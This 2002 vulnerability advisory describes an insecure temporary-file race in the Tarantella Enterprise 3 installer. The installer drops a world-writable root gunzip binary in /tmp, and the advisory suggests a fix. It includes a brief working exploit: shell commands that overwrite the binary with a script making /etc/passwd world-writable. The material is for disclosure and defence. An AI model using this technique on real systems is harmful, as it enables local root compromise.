======Vulnerability report for Tarantella Enterprise 3======
//1/14/2002//
**1. local root compromise during installation:**
The installation script provided with tarentella handles utility packages during installation insecurely. A root owned binary "gunzip" is created in /tmp with world writeable permissions, the pid is appended to the filename.
TMP_GUNZIP=$TMPDIR/gunzip$$
$ ls -l /tmp/gunzip16152
--rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1 The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
**2. Exploit:**
There is a race condition between when gunzip is extracted and used during installation. At which time a malicious local user could inject code to compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the above as an unpriviledged user.
**3. Recommendations:**
Perhaps create a directory in /tmp or /var/tmp and use that directory as a work place?
umask 077
mkdir /tmp/workdir
**4. Software: Tarantella Enterprise 3**